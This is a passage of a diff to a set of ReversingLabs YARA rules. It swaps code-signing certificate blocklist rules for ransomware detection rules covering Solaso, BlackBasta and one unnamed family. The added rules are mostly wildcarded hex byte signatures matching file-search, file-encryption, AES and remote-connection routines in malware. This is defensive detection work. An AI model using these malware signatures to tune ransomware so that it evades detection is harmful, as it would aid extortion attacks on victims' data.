+            ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ??
+            DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08
+        }
+		$find_files_p2 = {
+            13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13
+            ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
+            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
+            DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
+            7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$remote_connection = {
+            73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFVIMPEX SRL" and pe.signatures [ i ] . serial == "7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_file ) and ( $aes_encrypt ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Solaso ransomware."
 		author = "ReversingLabs"
-		id = "eea46214-d0f5-5e92-b678-4a1df09025ce"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76"
+		date = "2021-11-02"
+		modified = "2021-11-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3378-L3394"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade"
+		logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Solaso"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D
+            85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD
+            ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D
+            95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ??
+            ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ??
+            4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72
+            ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ??
+            ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ??
+            ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ??
+            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48
+        }
+		$find_files_p2 = {
+            8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D
+            41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8
+            E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8
+            ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B
+            B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ??
+            48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48
+            0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ??
+            ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ??
+            48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5
+            48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C
+            8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D
+        }
+		$encrypt_files_p1 = {
+            48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33
+            C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ??
+            4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84
+            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48
+            83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ??
+            ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8
+            ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ??
+            0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ??
+            99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63
+            C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85
+        }
+		$encrypt_files_p2 = {
+            C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89
+            03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ??
+            48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C
+            24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ??
+            0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48
+            83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8
+            ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74
+            ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78
+            ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48
+        }
+		$encrypt_files_p3 = {
+            03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ??
+            ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48
+            8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ??
+            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
+            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C
+            ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D
+            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ??
+            48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ??
+            48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85
+            ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ??
+            ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ??
+            ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ??
+            ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63
+        }
+		$encrypt_files_p4 = {
+            48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ??
+            ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ??
+            49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
+            ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89
+            76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
+            E8
+        }
+		$encrypt_files_p5 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57
+            48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ??
+            48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66
+            0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41
+            83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ??
+            ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ??
+            45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48
+            89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48
+            89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48
+            83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89
+            74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B
+        }
+		$encrypt_files_p6 = {
+            4D ?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ??
+            ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15
+            ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B
+            CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ??
+            ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A
+            75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8
+            ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ??
+            44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1
+            F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D
+            4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D
+            ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B
+        }
+		$encrypt_files_p7 = {
+            0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D
+            14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75
+            ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7
+            80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84
+            ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3
+            ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ??
+            48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8
+            ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8
+            ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49
+            8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOCS PTY LTD" and pe.signatures [ i ] . serial == "74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackBasta ransomware."
 		author = "ReversingLabs"
-		id = "c80245bd-908a-5b89-92e3-af0dd7bed63a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a"
+		date = "2022-12-13"
+		modified = "2022-12-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3396-L3412"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc"
+		logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackBasta"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TECHNO BEAVERS LIMITED" and pe.signatures [ i ] . serial == "3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3414-L3432"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38
+            75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ??
+            74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54
+            24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ??
+            49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45
+            33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ??
+            ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75
+            ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ??
+            ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
+            ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45
+            ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
+            ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
+            75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ??
+            74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48
+            8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C
+            8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ??
+            49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0
